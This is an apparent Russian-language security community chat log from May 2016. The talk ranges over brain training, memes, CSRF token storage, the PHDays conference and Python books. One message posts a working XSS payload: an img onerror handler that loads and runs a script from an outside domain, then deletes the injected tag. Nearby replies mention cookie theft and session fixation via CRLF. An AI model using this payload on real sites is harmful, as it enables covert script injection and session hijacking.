
Ka
15.05.2016
21:20:54
Что пишут?

1nk 1nk
15.05.2016
21:21:00
Интересно
Без таблеток говорят можно самому высот добиться

Google

Ka
15.05.2016
21:25:07
Так может расскажешь в 3 словах

1nk 1nk
15.05.2016
21:25:11
Не верю.

Ka
15.05.2016
21:25:24
каким образом?

1nk 1nk
15.05.2016
21:25:43
говорят каждый день матан по полтора часа решать
Видимо я тупенький такой от того, что я на начальных курсах матан не особо решал

Ka
15.05.2016
21:28:52
хм каким образом матан то в этом помогает

1nk 1nk
15.05.2016
21:29:12
Мышлялка работает
Аргументируют тем, что мозгу нужна нагрузка, т.е упорные, постоянные и методичные тренировки
Звучит логично на самом деле
Интересно, а ежедневный просмотр мемов и поиск в них самых годных, является упорной, постоянной и методической тренировкой?

Ka
15.05.2016
21:35:39
логично , согласен. Но для этого не обязательно матан. или только матан. Главное постоянно чем то нагружать. Но не просто какой то инфой что то типа в одно ухо влетело в другое вылетело а еще анализировать эту инфу и пытаться ее применять в какой то деятельности

1nk 1nk
15.05.2016
21:36:10
А мемы?
А еще вот пример

Google

1nk 1nk
15.05.2016
21:36:27
Я частенько упорно и методично сливаю катки в дотке
Стараясь и потея

Eugene
15.05.2016
21:37:48
Не забывайте про физ подготовку, укрепляет нейронные связи

Ka
15.05.2016
21:37:55
На счет мемов думаю это слабая пища для мозгов. мало связей

Eugene
15.05.2016
21:38:25
Игра на муз инструментах тоже стимулирует
Так что не " хлебом " единым

1nk 1nk
15.05.2016
21:39:02
Док, скажите пожалуйста, у меня дауншифтинг?

Eugene
15.05.2016
21:39:23
Это у меня дпуншифтинг

1nk 1nk
15.05.2016
21:39:40
А у тебя какой угол наклона?

Eugene
15.05.2016
21:41:04
Все с нуля

1nk 1nk
15.05.2016
21:42:29
Над придумать формулу для определения показателя угла дауншифтерской прямой
Шоб контролировать скорость спуска

Eugene
15.05.2016
21:45:05
? контролировать ....
Скорость ...
Тормоза придумали трусы

Ka
15.05.2016
21:46:01

1nk 1nk
15.05.2016
21:46:29
Ну когда на картинке ребус вместо тупой шутки.

Google

Ka
15.05.2016
21:47:18
ребус это ведь не мем?

1nk 1nk
15.05.2016
21:48:06
Мем, но чтобы его понять нужно разгадать ребус

Ka
15.05.2016
21:50:36
хм что то не помню ничего подобного. Но даже если этим не задаваться то думаю чем больше связей что то типа 9 нот и целая вселенная их вариаций тем благостно влияет на человека это занятие.
Как то криво мысли в 5 утра ложатся. Спать. определенно спать.

Bo0oM
15.05.2016
21:55:41
А это более прикольная альтернатива alert'у
<img src onerror="(function(u){var d=document,s=d.createElement('scri'+'pt');s.src=u;(d.head||d.documentElement).appendChild(s);s.parentNode.removeChild(s);}('//bo0om.ru/xss.js'));">
Хоть и боян
По красоте, внедряет скрипт, исполняет его и выпиливает (на странице нет его)

Arkadiy
15.05.2016
22:02:10
весьма

1nk 1nk
15.05.2016
22:06:57
А я на два

Bo0oM
15.05.2016
23:09:26
Такая практика у django
Но я бы не советовал

Andre
15.05.2016
23:10:15
А как бы посоветовал? Что в этом плохого?

Ka
16.05.2016
05:03:20
Восточная Сибирь +5

Arkadiy
16.05.2016
06:11:19
Яндекс хранит токен в сессии напримеи
Он у них несколько дней не меняется, что не слишком круто

Bo0oM
16.05.2016
07:05:28
Куки уводятся
Crlf фиксирует сессию. Поддомен может установить куки на главный домен. Короче опасна

kreon
16.05.2016
07:08:18
Ну можно совсем запараноить. Например передавать одну херню, на клиенте делать random()xsha256(key) и сравнивать с данными из сессии.
Заодно proof of work будет

Andre
16.05.2016
08:26:13
Что именно генерироватьи сверять? Токен формы с куки?)

Google

Andre
16.05.2016
08:26:13
Генерить и сверять :)

f1nnix
16.05.2016
08:49:50
Кто уже что то делал на Ethereum?
Кто программировал контракты и вообще ковырялся с ним?)
Дык там не о майнинге он вроде как

Петечка
16.05.2016
09:02:04
а у меня тут ерткуэйк был на 4.8 балла утром ранним около 4!! Впервые в жизни. Кровать запрыгало, проснулся, страшно, уснул!!

L1TH1UM
16.05.2016
09:19:26

Петечка
16.05.2016
09:34:15
мб

Денис
16.05.2016
11:07:16
Это успех
http://lukatsky.blogspot.ru/2016/05/phd-itsf.html
Сам Лукацкий перепостил ?
Хорошо хоть в чувстве юмора и самоиронии ему не откажешь

d1sen
16.05.2016
11:26:34
PHDец... Оригинально :)

Vladimir
16.05.2016
11:39:20

Денис
16.05.2016
11:41:57
PHDец... Оригинально :)
Я помню старое откуда-то "enjoy your phgays talks"
Это кажется кто-то из коллег отшил блэка с каким-то предложением, ну а тот в обратку написал

Vladimir
16.05.2016
11:51:24
я завтра буду рассказывать о том, что для киберпреступников важна финансовая выгода, а для ИБ ресечеров — удачно выступить и нажраться на phdadys/defcon/blackhat/hitb
поэтому all whitehat things релевантны :)

Денис
16.05.2016
11:54:36
У вас с Сергеем вместе или по очереди? Или вроде дискуссии?

nuartvision
16.05.2016
11:59:03
а заявлено вроде бы было про целевые атаки :)
но про выгоду/выступить/нажраться всяко завлекательнее:)

Bo0oM
16.05.2016
14:12:25
Канал событий PHDays, подключайтесь
@phdays_ru

Vladimir
16.05.2016
14:43:42

Google

Vladimir
16.05.2016
14:54:26
Дело не в магической малвари или приватных зиродеях.

yugoslavskiy
16.05.2016
14:54:57
А почему киберпреступникам противопоставляются рисерчеры?
Ну, т.е. безопасноситью организаций занимаются люди, которые с исследованиями связаны постольку поскольку. Это не к тому что они ленивы или вроде того, просто специфика. Мотивация людей которые харденят сервера и анализируют данные не обязательно в побухать на zn/phd. может это просто дело чести, или спортивный интерес, чтобы твою сеть, которую ты выстроил, не нагнули

Vladimir
16.05.2016
14:59:02
Ну, т.е. безопасноситью организаций занимаются люди, которые с исследованиями связаны постольку поскольку. Это не к тому что они ленивы или вроде того, просто специфика. Мотивация людей которые харденят сервера и анализируют данные не обязательно в побухать на zn/phd. может это просто дело чести, или спортивный интерес, чтобы твою сеть, которую ты выстроил, не нагнули
Да, это тоже возможно. Дело не конкретно в ресечерах. Дело в том, что у защищающихся сейчас меньше мотивация, чем у атакующих.

yugoslavskiy
16.05.2016
14:59:34
это да.

Vladimir
16.05.2016
15:00:02
Есть исключения, разумеется. Но в массе перевес на стороне атакующих.
Остальное - зиродеи, persistence, хитрая малварь - это следствия.

Bo0oM
16.05.2016
19:49:39
https://twitter.com/3dwave/status/732296053970604033

Денис
16.05.2016
20:10:09
#микролукацкий

yugoslavskiy
16.05.2016
20:16:47
#говорящаяголова

iOSif
16.05.2016
20:49:03
Товарищи, посоветуйте литературу по питону, пожалуйста)
Заранее спасибо)
Оу) шик, спасибо, совсем забыл про ссылочку

yugoslavskiy
16.05.2016
20:56:49
стянуть можно тут http://readmanuals.github.io

Web
16.05.2016
21:02:42
Cпасибо!
Будет кстати и мне.

Flamer
16.05.2016
21:04:47
Тут какой-то парниша на Донсково сидел с ноутом увешанным стикерами дефкон, пхд